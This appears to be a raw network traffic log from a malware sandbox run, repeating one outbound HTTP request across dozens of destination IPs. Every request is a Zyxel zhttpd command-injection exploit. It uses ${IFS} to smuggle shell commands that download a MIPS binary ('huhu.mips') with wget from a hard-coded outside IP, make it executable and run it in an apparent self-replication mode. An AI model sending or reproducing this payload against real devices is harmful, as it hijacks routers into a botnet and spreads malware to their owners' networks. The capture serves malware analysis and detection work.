                                            Feb 2, 2024 06:21:29.984512091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8905192.168.2.153921018.33.11.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984528065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8906192.168.2.153777840.124.41.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984566927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8907192.168.2.1557974129.1.241.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984622955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8908192.168.2.1546718183.181.181.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984679937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8909192.168.2.153410892.244.33.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984750032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8910192.168.2.1555194192.46.220.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984750986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8911192.168.2.153997061.38.224.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984776974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8912192.168.2.1558532182.246.248.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984827042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8913192.168.2.15390642.96.29.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984831095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8914192.168.2.1538346171.40.145.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984884024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8915192.168.2.1536628104.71.121.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984918118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8916192.168.2.154388041.89.13.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984955072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8917192.168.2.1537820167.93.110.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985024929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8918192.168.2.1557122159.185.153.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985047102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8919192.168.2.1537732170.128.142.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985085964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8920192.168.2.1556134170.89.81.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985136986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8921192.168.2.154536213.149.250.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985167980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8922192.168.2.156033463.149.190.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985188961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8923192.168.2.1540860172.148.207.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985260010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8924192.168.2.1535496156.31.7.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985276937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8925192.168.2.1541680116.222.166.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985347986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8926192.168.2.1547908114.158.84.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985368013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8927192.168.2.1558714203.14.69.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985434055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8928192.168.2.153920836.47.141.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985464096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8929192.168.2.155973671.220.120.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985469103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8930192.168.2.154559290.31.179.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985501051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8931192.168.2.155385032.94.3.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985522985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8932192.168.2.1549332144.173.90.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985574961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8933192.168.2.15524108.72.199.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985606909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8934192.168.2.155392074.132.49.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985641003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8935192.168.2.153835093.15.18.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985671997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8936192.168.2.1549156106.123.166.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985713005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8937192.168.2.1533202112.30.191.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985766888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8938192.168.2.1557318121.224.77.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985800982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8939192.168.2.1533708167.178.173.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985835075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8940192.168.2.1559926201.35.159.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985903025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8941192.168.2.1547192140.51.178.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985908031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8942192.168.2.153633253.71.20.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.985924006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8943192.168.2.1558408188.160.20.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986007929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8944192.168.2.1558818175.66.234.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986010075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8945192.168.2.1539234143.85.77.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986042976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8946192.168.2.1551942220.123.71.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986097097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8947192.168.2.1548962117.56.179.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986119032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8948192.168.2.1538954160.219.244.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986186028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8949192.168.2.155637258.140.215.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986232042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8950192.168.2.1541234108.88.52.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986275911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8951192.168.2.1555742208.187.251.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986296892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8952192.168.2.156027074.33.94.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986313105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8953192.168.2.1548446116.64.23.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986341953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8954192.168.2.156044283.145.133.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986398935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8955192.168.2.154473066.185.34.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986418962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8956192.168.2.1555334190.142.12.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986490011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8957192.168.2.154443889.1.23.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986534119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8958192.168.2.1541610187.232.89.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986562967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8959192.168.2.1546424167.188.20.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986608982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8960192.168.2.1559396150.198.96.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986634016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8961192.168.2.1543810143.104.67.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986671925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8962192.168.2.15412662.235.229.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986706972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8963192.168.2.155397836.255.141.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986756086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8964192.168.2.1543870203.241.34.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986795902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8965192.168.2.1556580173.13.187.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986829042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8966192.168.2.1555352100.211.27.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986872911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8967192.168.2.1537538222.181.181.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986911058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8968192.168.2.1560784153.237.216.231443
                                            TimestampBytes transferredDirectionData
